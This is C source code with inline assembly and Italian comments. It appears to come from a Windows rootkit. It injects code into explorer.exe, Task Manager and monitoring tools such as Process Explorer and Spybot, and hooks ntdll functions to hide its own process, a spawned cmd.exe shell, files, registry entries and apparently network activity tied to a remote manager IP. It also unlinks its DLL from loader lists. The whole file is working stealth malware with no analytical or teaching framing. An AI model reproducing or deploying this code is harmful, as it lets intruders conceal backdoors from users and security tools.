	 MOV DWORD PTR SS:[pData], ESI

	 MOV  EAX,DWORD PTR SS:[arg9]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg8]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg7]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg6]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg5]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg4]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg3]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg2]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[hProcess]
	 PUSH EAX

	 CALL ESI	//Chiama funzione
	 MOV DWORD PTR SS:[ret_code], EAX

	};
	
	HideDLL = pData->m_LoadLibrary(pData->LibName);
	if (!HideDLL)
		return ret_code;

	m_doHide = (DOHIDE)pData->m_GetProcAddress(HideDLL, 0x0002);
	m_doHide(*hProcess, pData->PID_Explorer, pData->Remote_Host,pData->LibName);
	
	// align the stack
	__asm {
		POP EAX
		POP EAX
		POP EAX
		POP EAX
	};
	
	pData->m_FreeLibrary(HideDLL);

	return ret_code;
}

/*
static BOOL WINAPI WrapCreateProcess(
  DWORD arg1,
  DWORD arg2,
  DWORD arg3,
  DWORD arg4,
  DWORD arg5,
  DWORD dwCreationFlags,                     // creation flags
  DWORD arg7,
  DWORD arg8,
  LPSTARTUPINFO lpStartupInfo,
  LPPROCESS_INFORMATION lpProcessInformation // process information
)
{
	BOOL ret_code;
	NTCREATEPROCESS_WRAP *pData;
	HMODULE HideDLL;
	DOHIDE m_doHide;
	BOOL Flag_Suspended;

	if (dwCreationFlags & CREATE_SUSPENDED)
		Flag_Suspended = 1;
	else
	{
		Flag_Suspended = 0;
		dwCreationFlags |= CREATE_SUSPENDED;
	}
	lpStartupInfo->cbReserved2 = 0;

	// XXX - L'indirizzo verra' scritto nel codice a runtime!!!!
	__asm {
	 MOV ESI,69696969h	// Indirizzo da sovrascrivere

	 MOV DWORD PTR SS:[pData], ESI
	 MOV  EAX,DWORD PTR SS:[lpProcessInformation]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[lpStartupInfo]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg8]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg7]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[dwCreationFlags]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg5]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg4]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg3]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg2]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg1]
	 PUSH EAX

	 CALL DWORD PTR DS:[ESI]	//Chiama funzione
	 MOV DWORD PTR SS:[ret_code], EAX
     
	};
	
	HideDLL = pData->m_LoadLibrary(pData->LibName);
	if (!HideDLL)
	{
		if (!Flag_Suspended)
			pData->m_ResumeThread(lpProcessInformation->hThread);
		return ret_code;
	}

	m_doHide = (DOHIDE)pData->m_GetProcAddress(HideDLL, 0x0002);
	m_doHide(lpProcessInformation->hProcess, pData->PID_Explorer, pData->Remote_Host,pData->LibName);
	
	// align the stack
	__asm {
		POP EAX
		POP EAX
		POP EAX
		POP EAX
	};

	if (!Flag_Suspended)
	  pData->m_ResumeThread(lpProcessInformation->hThread);

	pData->m_FreeLibrary(HideDLL);

	return ret_code;

}*/

static DWORD WINAPI WrapNtQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass,
												 PVOID SystemInformation,
												 ULONG SystemInformationLength,
												 PULONG ReturnLength)
{
	DWORD PID1, PID_CMD, ret_code;
	NTQUERYSYSTEMINFORMATION_WRAP *pData;
	SYSTEM_PROCESS_INFORMATION_NT *Spi;
	SYSTEM_PROCESS_INFORMATION_NT *Old_Spi;
	char *Spi_Offs;

	// XXX - L'indirizzo verra' scritto nel codice a runtime!!!!
	__asm {
	 MOV ESI,69696969h	// Indirizzo da sovrascrivere

	 MOV DWORD PTR SS:[pData], ESI

	 MOV EDX,DWORD PTR SS:[SystemInformationClass]
	 MOV ECX,DWORD PTR SS:[SystemInformation]
	 MOV EDI,DWORD PTR SS:[SystemInformationLength]
	 MOV EAX,DWORD PTR SS:[ReturnLength]

	 PUSH EAX			// pusha i parametri
	 PUSH EDI
	 PUSH ECX
	 PUSH EDX

	 CALL ESI	//Chiama Wrapper
	 MOV DWORD PTR SS:[ret_code], EAX
	 
	};

	if (ret_code >= 0x40000000) 
		return ret_code;

	PID1 = pData->PID1;

	// Fake PID
	PID_CMD = 0x69696969;
	ULONG TempLen = 0;

	if (SystemInformationClass==SystemProcessInformation && SystemInformation!=NULL && SystemInformationLength>0) {
		Spi_Offs = (char *)SystemInformation;

		do  
		{
			if ( (ReturnLength && TempLen > *ReturnLength) || TempLen > SystemInformationLength )
				break;
			
			Spi = (SYSTEM_PROCESS_INFORMATION_NT *)Spi_Offs;
		
			if (Spi->ProcessName.Length > 0 && Spi->ProcessName.Buffer &&  
				( (*((DWORD *)Spi->ProcessName.Buffer) == 0x004D0043 && *((DWORD *)Spi->ProcessName.Buffer + 1) == 0x002E0044) ||
				  (*((DWORD *)Spi->ProcessName.Buffer) == 0x006D0063 && *((DWORD *)Spi->ProcessName.Buffer + 1) == 0x002E0064)) )

				if (PID_CMD == 0x69696969) // Nasconde il primo CMD che trova e i suoi figli
					PID_CMD = Spi->ProcessId;

			// Cerca IExplorer, CMD e tutti i suoi figli diretti
			if (PID1 == Spi->ProcessId || PID_CMD == Spi->ProcessId || PID_CMD == Spi->ProcessId) {
				// Unlinka la struttura del nostro processo
				Old_Spi->NextEntryDelta += Spi->NextEntryDelta;

				// Se e' l'ultimo processo, termina la lista
				if (Spi->NextEntryDelta == 0)
					Old_Spi->NextEntryDelta = 0;

			}
			else
				Old_Spi = Spi;

		
			Spi_Offs += Spi->NextEntryDelta;
			TempLen	 += Spi->NextEntryDelta;

		} while(Spi->NextEntryDelta);

	}

	return ret_code;
}




//////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////

BOOL GetPEB (INJDATA_PEB *pData)
{
	DWORD Image_Base;
	DWORD Loaded_Head;
	char  *pPEB;
	DWORD bytesRead;
	char  *Ldr;


	pData->Image_Base = 0;
	pData->Loaded_Head = 0;

	__asm {

		MOV EAX,30h
		MOV EAX,DWORD PTR FS:[EAX]
		ADD EAX, 08h
		MOV SS:[pPEB], EAX
	}

	ReadProcessMemory(pData->hProc, pPEB, &Image_Base, 4, &bytesRead);
	if (bytesRead!=4)
		return FALSE;
	
	pData->Image_Base = Image_Base;

	pPEB += 4;

	ReadProcessMemory(pData->hProc, pPEB, &Ldr, 4, &bytesRead);
	if (bytesRead!=4)
		return FALSE;

	Ldr += 0x1C;

	ReadProcessMemory(pData->hProc, Ldr, &Loaded_Head, 4, &bytesRead);
	if (bytesRead==4)
		pData->Loaded_Head = Loaded_Head;

	return TRUE;
}


MY_LIST_ENTRY *GetMyPEB ()
{
	DWORD Loaded_Head;
	DWORD **pPEB;
	DWORD *Ldr;

	__asm {
		MOV EAX,30h
		MOV EAX,DWORD PTR FS:[EAX]
		ADD EAX, 08h
		MOV SS:[pPEB], EAX
	}

	Ldr = *(pPEB + 1);
	Loaded_Head = *(Ldr + 3);

	return (MY_LIST_ENTRY *)Loaded_Head;
}

// Cerca hModule nella lista delle dipendenze e lo elimina
void Remove_Depends(DWORD hModule)
{
	MY_LIST_ENTRY *Depends_List, *List_Head;
	MY_LIST_ENTRY *prev, *next;

	Depends_List = List_Head = GetMyPEB();
	do {
		// Ha trovato il modulo e lo cancella dalle 3 liste
		if (Depends_List->ImageBase == hModule) {

			prev = (MY_LIST_ENTRY *) Depends_List->InLoadPrev;
			next = (MY_LIST_ENTRY *) Depends_List->InLoadNext;
			prev->InLoadNext = (DWORD)next;
			next->InLoadPrev = (DWORD)prev;

			if (Depends_List->InMemPrev && Depends_List->InMemNext) {
				prev = (MY_LIST_ENTRY *) (Depends_List->InMemPrev - 8);
				next = (MY_LIST_ENTRY *) (Depends_List->InMemNext - 8);
				prev->InMemNext = ((DWORD)next) + 8;
				next->InMemPrev = ((DWORD)prev) + 8;
			}

			if (Depends_List->InInitPrev && Depends_List->InInitNext) {
				prev = (MY_LIST_ENTRY *) (Depends_List->InInitPrev - 16);
				next = (MY_LIST_ENTRY *) (Depends_List->InInitNext - 16);
				prev->InInitNext = ((DWORD)next) + 16;
				next->InInitPrev = ((DWORD)prev) + 16;
			}

			break;			
		}
		Depends_List = (MY_LIST_ENTRY *)Depends_List->InLoadNext;
	} while(List_Head != Depends_List); 
}

void Inject_Rewrite(HANDLE hProcess, void *CODE_WRAP, DWORD CODE_LEN, void *DATA_WRAP, DWORD DATA_LEN, char *FUNC_NAME)
{
	char		 *pDataRemote_Wrap;
	DWORD		 *pCodeRemote_Wrap;
	DWORD dwNumBytesXferred = 0;
	char tmpAPIbuff[32];

	// Usati per localizzare il puntatore alla zona dati della funzione wrapper
	char *Find_Global;
	char ByteGlobal;

	//------------------------------------------------------

	// Inietta il WRAPPER - DATI
	pDataRemote_Wrap = (char *) VirtualAllocEx( hProcess, 0, DATA_LEN, MEM_COMMIT, PAGE_READWRITE );
	memcpy(DATA_WRAP, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE9\x90\x90\x90\x90", 24);
	if (!pDataRemote_Wrap) return;
	WriteProcessMemory( hProcess, pDataRemote_Wrap, DATA_WRAP, DATA_LEN, &dwNumBytesXferred );

	// Inietta il WRAPPER - CODICE
	pCodeRemote_Wrap = (PDWORD) VirtualAllocEx( hProcess, 0, CODE_LEN, MEM_COMMIT, PAGE_EXECUTE_READWRITE );		
	if (!pCodeRemote_Wrap) return;
	WriteProcessMemory( hProcess, pCodeRemote_Wrap, CODE_WRAP, CODE_LEN, &dwNumBytesXferred );

	// Modifica l'indirizzo dei dati "globali" della funzione wrap
	Find_Global = (char *)pCodeRemote_Wrap;

	// XXX - Sovrascrive l'offset
	do {
		Find_Global++;
		ReadProcessMemory( hProcess, Find_Global, &ByteGlobal, 1, &dwNumBytesXferred);
	} while (ByteGlobal!=0x69);

	WriteProcessMemory( hProcess, Find_Global, &pDataRemote_Wrap, 4, &dwNumBytesXferred );

	//--------------------------------------------------------
	HMODULE hMod = GetModuleHandle("ntdll.dll");
	char *Original_API = (char *)GetProcAddress(hMod, FUNC_NAME);
	
	ReadProcessMemory( hProcess, Original_API, tmpAPIbuff, 32, &dwNumBytesXferred);

	DWORD code_len = 0;
	char JMP_Code[16];


	while (code_len < REDIR_SIZE)
		code_len += OpCodeAlign(tmpAPIbuff + code_len);

	if (code_len > 15 || Original_API==NULL)
		return;

	// Prepariamo il JMP CODE
	ReadProcessMemory( hProcess, Original_API, JMP_Code, code_len, &dwNumBytesXferred);
	if (dwNumBytesXferred != code_len)
		return;

	WriteProcessMemory( hProcess, pDataRemote_Wrap, JMP_Code, code_len, &dwNumBytesXferred);

	//JMP_Code[0]='\xE9';
	//*((DWORD *)(&JMP_Code[1])) = (DWORD)((DWORD)pCodeRemote_Wrap - (DWORD)Original_API - 5);
	
	JMP_Code[0]='\xB8';
	*((DWORD *)(&JMP_Code[1])) = (DWORD)(pCodeRemote_Wrap);
	JMP_Code[5]='\xFF';
	JMP_Code[6]='\xE0';

	WriteProcessMemory( hProcess, Original_API, JMP_Code, REDIR_SIZE, &dwNumBytesXferred);

	Original_API = (char *)((DWORD)Original_API + code_len - ((DWORD)pDataRemote_Wrap + 20));
	WriteProcessMemory( hProcess, pDataRemote_Wrap + 16, &Original_API, 4, &dwNumBytesXferred);

}




/*	
void Inject(HANDLE hProcess, void *CODE_WRAP, DWORD CODE_LEN, void *DATA_WRAP, DWORD DATA_LEN, char *DLL_NAME, char *FUNC_NAME)
{
	void		 *pDataRemote_Wrap;
	DWORD		 *pCodeRemote_Wrap;

	INJDATA_HOOK DataLocal_Hook;
	INJDATA_PEB  DataLocal_PEB;

	DWORD dwNumBytesXferred = 0;

	// Usati per localizzare il puntatore alla zona dati della funzione wrapper
	char *Find_Global;
	char ByteGlobal;

	// Pec ciclare le dll caricate
	MY_LIST_ENTRY *firstEntry;
	MY_LIST_ENTRY *nextEntry;
	MY_LIST_ENTRY pExt_table;


	// Esegue la funzione GetPEB 
	DataLocal_PEB.hProc = hProcess;		
	if (!GetPEB(&DataLocal_PEB))
		return;

	//------------------------------------------------------

	// Inietta il WRAPPER - DATI
	pDataRemote_Wrap = (void *) VirtualAllocEx( hProcess, 0, DATA_LEN, MEM_COMMIT, PAGE_READWRITE );
	if (!pDataRemote_Wrap) return;
	WriteProcessMemory( hProcess, pDataRemote_Wrap, DATA_WRAP, DATA_LEN, &dwNumBytesXferred );

	// Inietta il WRAPPER - CODICE
	pCodeRemote_Wrap = (PDWORD) VirtualAllocEx( hProcess, 0, CODE_LEN, MEM_COMMIT, PAGE_EXECUTE_READWRITE );		
	if (!pCodeRemote_Wrap) return;
	WriteProcessMemory( hProcess, pCodeRemote_Wrap, CODE_WRAP, CODE_LEN, &dwNumBytesXferred );


	// Modifica l'indirizzo dei dati "globali" della funzione wrap
	Find_Global = (char *)pCodeRemote_Wrap;

	// XXX - Sovrascrive l'offset
	do {
		Find_Global++;
		ReadProcessMemory( hProcess, Find_Global, &ByteGlobal, 1, &dwNumBytesXferred);
	} while (ByteGlobal!=0x69);

	WriteProcessMemory( hProcess, Find_Global, &pDataRemote_Wrap, 4, &dwNumBytesXferred );
	

    //------------------------------------------------------

	
	// Inizializza dati per le funzioni GetPEB e SearchImportTable
	strcpy(DataLocal_Hook.DLL, DLL_NAME);
	strcpy(DataLocal_Hook.FUNC, FUNC_NAME);
	DataLocal_Hook.Data = (INJDATA_WRAP *)pDataRemote_Wrap;
	DataLocal_Hook.WrapFunc = pCodeRemote_Wrap;
	DataLocal_Hook.hProc = hProcess;
	
	// Parte con le dipendenze dirette (Main Import Table)
	nextEntry = firstEntry = (MY_LIST_ENTRY *)DataLocal_PEB.Loaded_Head;
	DataLocal_Hook.ImageBase = (unsigned char *)DataLocal_PEB.Image_Base;


	// Cicla tutte le dipendenze dirette e indirette
	do
	{
		SearchImportTable(&DataLocal_Hook);

		// Se il processo non ha ancora caricato la PEB
		if (firstEntry == NULL)
		{
			// XXX - Diamo a mano delle librerie
			DataLocal_Hook.ImageBase = (unsigned char *)GetModuleHandle("ntdll.dll");
			SearchImportTable(&DataLocal_Hook);

			DataLocal_Hook.ImageBase = (unsigned char *)GetModuleHandle("kernel32.dll");
			SearchImportTable(&DataLocal_Hook);

			DataLocal_Hook.ImageBase = (unsigned char *)GetModuleHandle("advapi32.dll");
			SearchImportTable(&DataLocal_Hook);
			// ....
			break;
		}

		// Legge e passa alla prossima dll in lista
		ReadProcessMemory( hProcess, nextEntry, &pExt_table, sizeof(MY_LIST_ENTRY), &dwNumBytesXferred);
		DataLocal_Hook.ImageBase = (unsigned char *)pExt_table.ImageBase;
		nextEntry = (MY_LIST_ENTRY *)pExt_table.next;

		if ((MY_LIST_ENTRY *)nextEntry == firstEntry) 
			break;
		
	} while (1);


	
	DataLocal_Hook.ImageBase = (unsigned char *)GetModuleHandle(DLL_NAME);
	if(DataLocal_Hook.ImageBase)
		SearchExportTable(&DataLocal_Hook);
}*/


// FUNZIONE ESPORTATA --------------------------------------------------------------------
void doWrapping(HANDLE hProcess, int PID, int Remote_Host, char *HHDLL_Name)
{
	NTQUERYSYSTEMINFORMATION_WRAP DataNtQuerySystemInformation;
	NTQUERYDIRECTORYFILE_WRAP DataWrap_NtQueryDirectoryFile;
	NTCREATEPROCESSRW_WRAP DataWrap_CreateProcess;
	NTDEVICEIOCONTROLFILE_WRAP DataWrap_DeviceIoControlFile;
	NTENUMERATEVALUEKEY_WRAP DataWrap_NtEnumerateValueKey;
	NTQUERYKEY_WRAP DataWrap_QueryKey;

	HMODULE hMod = GetModuleHandle("kernel32.dll");
	DataWrap_CreateProcess.PID_Explorer = PID;
	DataWrap_CreateProcess.Remote_Host = Remote_Host;
	DataWrap_CreateProcess.m_LoadLibrary =(LOADLIBRARY) GetProcAddress( hMod, "LoadLibraryA" );
	DataWrap_CreateProcess.m_FreeLibrary =(FREELIBRARY) GetProcAddress( hMod, "FreeLibrary" );
	DataWrap_CreateProcess.m_GetProcAddress =(GETPROCADDRESS) GetProcAddress( hMod, "GetProcAddress");
	strcpy(DataWrap_CreateProcess.LibName, HHDLL_Name);
	
	Inject_Rewrite(hProcess, &WrapNtCreateProcess, 1024, &DataWrap_CreateProcess, sizeof(NTCREATEPROCESSRW_WRAP), "NtCreateProcess");
	Inject_Rewrite(hProcess, &WrapNtCreateProcessEx, 1024, &DataWrap_CreateProcess, sizeof(NTCREATEPROCESSRW_WRAP), "NtCreateProcessEx");

	DataNtQuerySystemInformation.PID1 = PID;
	Inject_Rewrite(hProcess, &WrapNtQuerySystemInformation, 1024, &DataNtQuerySystemInformation, sizeof(NTQUERYSYSTEMINFORMATION_WRAP), "NtQuerySystemInformation");

	DataWrap_DeviceIoControlFile.PID1 = PID;
	DataWrap_DeviceIoControlFile.Remote_Host = Remote_Host;
	Inject_Rewrite(hProcess, &WrapNtDeviceIoControlFile, 1024, &DataWrap_DeviceIoControlFile, sizeof(NTDEVICEIOCONTROLFILE_WRAP), "NtDeviceIoControlFile");

	Inject_Rewrite(hProcess, &WrapNtQueryDirectoryFile, 1024, &DataWrap_NtQueryDirectoryFile, sizeof(NTQUERYDIRECTORYFILE_WRAP), "NtQueryDirectoryFile");
	Inject_Rewrite(hProcess, &WrapNtEnumerateValueKey, 1024, &DataWrap_NtEnumerateValueKey, sizeof(NTENUMERATEVALUEKEY_WRAP), "NtEnumerateValueKey");
	
	hMod = GetModuleHandle("ntdll.dll");
	DataWrap_QueryKey.m_QueryValue = (NTQUERYVALUEKEY) GetProcAddress( hMod, "NtEnumerateValueKey" );
	Inject_Rewrite(hProcess, &WrapQueryKey, 1024, &DataWrap_QueryKey, sizeof(NTQUERYKEY_WRAP), "NtQueryKey");
}
// FUNZIONE ESPORTATA --------------------------------------------------------------------




void HideDLL(char *HHDLL_Name)
{
	char *Programs_to_inject[20];
	SYSTEM_PROCESS_INFORMATION_NT * pTmp, * SystemInformation_nt;
	ULONG pQSISize = 0x8000;
    NTSTATUS Status;
	HINSTANCE hNTdll;
	ZwQuerySystemInformation_t ZwQuerySystemInformation = NULL; 
	HANDLE hProcess;
	NTCREATEPROCESSRW_WRAP DataWrap_CreateProcess;

	NTQUERYDIRECTORYFILE_WRAP DataWrap_NtQueryDirectoryFile;
	int Remote_Host;

	HMODULE hMod = GetModuleHandle("kernel32.dll");

	WORD wVersionRequested;
	WSADATA wsaData;
 

	memset(Programs_to_inject, 0, sizeof(Programs_to_inject));
	Programs_to_inject[0] = strdup("TaskInfo.exe");
	Programs_to_inject[1] = strdup("TeaTimer.exe");
	Programs_to_inject[2] = strdup("SpybotSD.exe");
	Programs_to_inject[3] = strdup("procexp.exe");
	Programs_to_inject[4] = strdup("tcm.exe");

	wVersionRequested = MAKEWORD( 2, 2 );
	WSAStartup( wVersionRequested, &wsaData );

	Remote_Host = htonl(ex_ManagerIP);

	DataWrap_CreateProcess.PID_Explorer = GetCurrentProcessId();
	DataWrap_CreateProcess.Remote_Host = Remote_Host;
	DataWrap_CreateProcess.m_LoadLibrary =(LOADLIBRARY) GetProcAddress( hMod, "LoadLibraryA" );
	DataWrap_CreateProcess.m_FreeLibrary =(FREELIBRARY) GetProcAddress( hMod, "FreeLibrary" );
	DataWrap_CreateProcess.m_GetProcAddress =(GETPROCADDRESS) GetProcAddress( hMod, "GetProcAddress");
	strcpy(DataWrap_CreateProcess.LibName, HHDLL_Name);
	


	// Cerca alcuni processi gia' aperti in cui fare l'injeciton	
	// Sicuramente EXPLORER.exe e poi tutti i programmi di monitoring
	// che sono aperti prima dell'installazione
	hNTdll = LoadLibrary("NTDLL");
	ZwQuerySystemInformation = (ZwQuerySystemInformation_t) GetProcAddress(hNTdll, "ZwQuerySystemInformation");

	if(!ZwQuerySystemInformation)
		return;
	    
	do {
		if ( !(SystemInformation_nt = (SYSTEM_PROCESS_INFORMATION_NT *) malloc(pQSISize)) )
			return;

		Status = ZwQuerySystemInformation(0x5, SystemInformation_nt, pQSISize, NULL);

        if (Status == STATUS_INFO_LENGTH_MISMATCH) {
            free(SystemInformation_nt);
            pQSISize *= 2;
        } else if (!NT_SUCCESS(Status)) {
            free(SystemInformation_nt);
            return;
        }
    } while (Status == STATUS_INFO_LENGTH_MISMATCH);

	// Cerca prima EXPLORER.exe
	pTmp = SystemInformation_nt;
	while( !pTmp->ProcessName.Buffer || 
		    (wcscmp(L"EXPLORER.EXE", pTmp->ProcessName.Buffer) && 
			 wcscmp(L"explorer.exe", pTmp->ProcessName.Buffer) && 
			 wcscmp(L"Explorer.exe", pTmp->ProcessName.Buffer) && 
			 wcscmp(L"Explorer.EXE", pTmp->ProcessName.Buffer))) {
		if(pTmp->NextEntryDelta == 0)
			return;
		pTmp = (SYSTEM_PROCESS_INFORMATION_NT *) (pTmp->NextEntryDelta + (DWORD)pTmp);
	}			

	if ( !(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pTmp->ProcessId)) )
		return;

	// XXX Stiamo facendo una REWRITE su un processo gia' attivo (explorer.exe)
	Inject_Rewrite(hProcess, &WrapNtCreateProcess, 1024, &DataWrap_CreateProcess, sizeof(NTCREATEPROCESSRW_WRAP), "NtCreateProcess");
	Inject_Rewrite(hProcess, &WrapNtCreateProcessEx, 1024, &DataWrap_CreateProcess, sizeof(NTCREATEPROCESSRW_WRAP), "NtCreateProcessEx");
	Inject_Rewrite(hProcess, &WrapNtQueryDirectoryFile, 1024, &DataWrap_NtQueryDirectoryFile, sizeof(NTQUERYDIRECTORYFILE_WRAP), "NtQueryDirectoryFile");
	

	// Cerca TaskInfo e altri processi in cui fare injection
	for (int index=0; Programs_to_inject[index]; index++) {
		char Ascii_name[1024];

		pTmp = SystemInformation_nt;

		while(1) {
			if (pTmp->ProcessName.Buffer) {
				wsprintf(Ascii_name,"%ls",pTmp->ProcessName.Buffer);
				if (!_stricmp(Programs_to_inject[index], Ascii_name))
					break;
			}

			if(pTmp->NextEntryDelta == 0)
				break;
			pTmp = (SYSTEM_PROCESS_INFORMATION_NT *) (pTmp->NextEntryDelta + (DWORD)pTmp);
		}			
		if(pTmp->NextEntryDelta == 0)
			continue;
		hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pTmp->ProcessId);
		doWrapping( hProcess, GetCurrentProcessId(), Remote_Host, HHDLL_Name);
		CloseHandle(hProcess);	
	}

	free(SystemInformation_nt);
}



DWORD WINAPI HideTaskManager(ThreadParams *TMParam)
{
	        
	HWND MainWin = NULL;
	DWORD PID, LastPid = 0, LastPidExplorer = 0;
	NTQUERYSYSTEMINFORMATION_WRAP DataNtQuerySystemInformation;
	HANDLE hProcess;
// Unreferenced
// XXX	NTCREATEPROCESSRW_WRAP DataWrap_CreateProcess;
// XXX	NTQUERYDIRECTORYFILE_WRAP DataWrap_NtQueryDirectoryFile;
// XXX	int Remote_Host;

	while(1)
	{
		Sleep(250);

		// Nasconde da Task Manager
		MainWin = FindWindowEx(NULL, NULL, "#32770","Windows Task Manager");
		if (!MainWin)
			MainWin = FindWindowEx(NULL, NULL, "#32770","Task Manager Windows");
		if (!MainWin)
			MainWin = FindWindowEx(NULL, NULL, "#32770","Windows NT Task Manager");

		// Se e' attivo Task Manager
		if (MainWin) {
			PID = 0;
			GetWindowThreadProcessId (MainWin, &PID);		
			
			// se non abbiamo gia' injectato dentro questo TaskManager
			if (LastPid != PID && PID) {
	
				LastPid = PID;

				hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, PID);		
			
				DataNtQuerySystemInformation.PID1 = TMParam->Pid;
				Inject_Rewrite(hProcess, &WrapNtQuerySystemInformation, 1024, &DataNtQuerySystemInformation, sizeof(NTQUERYSYSTEMINFORMATION_WRAP), "NtQuerySystemInformation");

				// Forziamo l'update (dal menu' refresh now) !!!
				HMENU menu = GetMenu(MainWin);
				HMENU submenu = GetSubMenu(menu, 2);
				int pos = GetMenuItemID(submenu, 0);
				PostMessage(MainWin, WM_COMMAND, (WPARAM) pos, 0);
			}
		}

	}

	// not reached :)
	return 0;
}
